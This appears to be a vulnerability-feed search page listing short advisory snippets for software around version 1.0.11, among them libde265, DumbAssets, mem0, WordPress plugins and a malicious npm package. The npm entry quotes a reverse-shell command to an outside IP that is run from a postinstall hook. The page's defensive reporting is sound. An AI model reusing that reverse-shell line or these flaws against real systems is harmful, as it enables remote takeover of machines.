Astra Linux - уязвимость в libde265

It was discovered that Libde265 v1.0.11 contains a segmentation violation through the function decodercontext::processSliceSegmentHeader in decctx.cc...

CVE-2026-45231

DumbAssets through 1.0.11 contains a stored cross-site scripting vulnerability in asset fields including name, description, modelNumber, serialNumber, and tags that are stored without server-side sanitization and rendered using innerHTML without client-side escaping. Attackers can create or updat...

CVE-2026-45230 DumbAssets 1.0.11 Path Traversal File Deletion via /api/delete-file

DumbAssets through 1.0.11 contains a path traversal vulnerability in the POST /api/delete-file endpoint and filesToDelete array parameters that allows unauthenticated attackers to delete arbitrary files by supplying ../ sequences that bypass directory boundary validation. Attackers can exploit th...

Malicious code in hello-world-pkg-value-value-p (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector d768990007f2926e3a58020102d277c3a604c6aa3bc70056cd466bc24437fc89 This package's postinstall hook executes node index.js, which runs execSync'bash -i & /dev/tcp/52.249.218.132/8080 0&1' — an interactive bash reverse...

CVE-2026-7597

A vulnerability was found in mem0ai mem0 up to 1.0.11. This affects the function pickle.load/pickle.dump of the file mem0/vectorstores/faiss.py. Performing a manipulation results in deserialization. It is possible to initiate the attack remotely. The exploit has been made public and could be used...

@puchunjie/doc-tools-mcp (>=1.0.11 <=1.0.14) potentially affected by CVE-2026-7738 via @puchunjie/doc-tools-mcp (=1.0.18)

@puchunjie/doc-tools-mcp NPM version =1.0.18 is affected by a known vulnerability. The following packages have a transitive dependency on @puchunjie/doc-tools-mcp and may be impacted: - @puchunjie/doc-tools-mcp =1.0.11, =1.0.14 Source cves: CVE-2026-7738 Source advisory:...

CVE-2026-7597

A vulnerability was found in mem0ai mem0 up to 1.0.11. This affects the function pickle.load/pickle.dump of the file mem0/vectorstores/faiss.py. Performing a manipulation results in deserialization. It is possible to initiate the attack remotely. The exploit has been made public and could be used...

mem0 输入验证错误漏洞

mem0 is an efficient memory algorithm benchmarking tool open-sourced by Mem0. An input validation error vulnerability exists in mem0 1.0.11 and earlier versions, which stems from improper manipulation of the pickle.load/pickle.dump functions in the mem0/vectorstores/faiss.py file, which could lea...

PT-2026-36549

Name of the Vulnerable Software and Affected Versions mem0ai mem0 versions prior to 1.0.12 Description An unsafe deserialization issue exists in the pickle.load and pickle.dump functions within the mem0/vector stores/faiss.py file. This allows a remote attacker to perform a manipulation that...

[SECURITY] [DLA 4550-1] libde265 security update

Debian LTS Advisory DLA-4550-1 [email protected] https://www.debian.org/lts/security/ Andreas Henriksson April 27, 2026 https://wiki.debian.org/LTS Package : libde265 Version : 1.0.11-0+deb11u4 CVE ID : CVE-2023-51792 CVE-2026-33164 CVE-2026-33165 Debian Bug : 1131468 1131469 It was fou...

WordPress Ultra Addons for WPForms plugin <= 1.0.11 - Broken Access Control vulnerability

Broken Access Control vulnerability discovered by CidKagenouSama in WordPress Plugin Ultra Addons for WPForms versions = 1.0.11...

📄 WordPress AI Feeds 1.0.11 Shell Upload

Proof of concept exploit for an unauthenticated arbitrary file upload vulnerability in the AI Feeds plugin for WordPress versions 1.0.11 and earlier. The vulnerability allows unauthenticated attackers to upload arbitrary files, including PHP webshells, by exploiting the GitHub integration...

CVE-2026-25333

Missing Authorization vulnerability in peregrinethemes Shopwell shopwell allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Shopwell: from n/a through = 1.0.11...

CVE-2026-25333

Missing Authorization vulnerability in peregrinethemes Shopwell shopwell allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Shopwell: from n/a through = 1.0.11...

CVE-2026-25333

Missing Authorization vulnerability in peregrinethemes Shopwell shopwell allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Shopwell: from n/a through = 1.0.11...

CVE-2026-25333

CVE-2026-25333 affects the WordPress Shopwell theme (versions

PT-2026-20701

Missing Authorization vulnerability in peregrinethemes Shopwell shopwell allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Shopwell: from n/a through = 1.0.11...

WordPress plugin Shopwell 安全漏洞

WordPress and WordPress plugins are both products of the WordPress Foundation. WordPress is a blog platform developed using the PHP language. This platform allows for the creation of personal blog websites on servers based on PHP and MySQL. A WordPress plugin is an application extension. The...

WordPress Shopwell theme <= 1.0.11 - Broken Access Control vulnerability

Broken Access Control vulnerability discovered by Trương Hữu Phúc truonghuuphuc in WordPress Theme Shopwell versions = 1.0.11...

CVE-2020-37148

P5 FNIP-8x16A/FNIP-4xSH versions 1.0.20 and 1.0.11 suffer from a stored cross-site scripting vulnerability. Input passed to several GET/POST parameters is not properly sanitized before being returned to the user, allowing attackers to execute arbitrary HTML and script code in a user's browser...